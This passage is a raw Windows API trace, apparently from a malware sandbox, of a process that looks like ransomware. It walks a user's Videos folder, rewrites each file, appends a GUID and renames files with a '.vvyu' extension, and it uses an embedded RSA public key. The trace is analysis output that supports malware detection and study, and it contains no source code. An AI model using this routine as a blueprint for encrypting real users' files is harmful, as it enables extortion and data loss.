lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0187.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.940] GetCurrentThreadId () returned 0x264 [0187.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d38068 [0187.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.941] GetCurrentThreadId () returned 0x264 [0187.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0187.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39808 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39868 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39880 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39820 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397f0 [0187.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0187.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38e68 | out: hHeap=0x6a0000) returned 1 [0187.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.952] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x419d, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x419d, lpOverlapped=0x0) returned 1 [0187.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.953] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x41a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.953] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.954] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.955] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.955] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.955] CloseHandle (hObject=0x584) returned 1 [0187.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0187.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.956] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\U7uNQ0 Vl v.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\u7unq0 vl v.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\U7uNQ0 Vl v.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\u7unq0 vl v.flv.vvyu")) returned 1 [0187.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.959] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.961] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x237ede80, ftCreationTime.dwHighDateTime=0x1d8a5cf, ftLastAccessTime.dwLowDateTime=0xd7765030, ftLastAccessTime.dwHighDateTime=0x1d8a5f7, ftLastWriteTime.dwLowDateTime=0xd7765030, ftLastWriteTime.dwHighDateTime=0x1d8a5f7, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UsiZz5vLNleCVW.mp4", cAlternateFileName="USIZZ5~1.MP4")) returned 1 [0187.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38e68 [0187.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38e68 | out: hHeap=0x6a0000) returned 1 [0187.962] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\UsiZz5vLNleCVW.mp4") returned=".mp4" [0187.962] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\UsiZz5vLNleCVW.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\usizz5vlnlecvw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.962] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=1060) returned 1 [0187.962] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.965] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.965] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.968] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.968] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x424, lpOverlapped=0x0) returned 1 [0187.968] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.968] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.968] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.969] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.970] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.970] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.970] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.970] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.970] GetLastError () returned 0x0 [0187.971] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.971] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.971] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.971] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.971] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x420) returned 0x2d42908 [0187.971] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38e68 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38eb0 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.972] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d3a670 [0187.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | 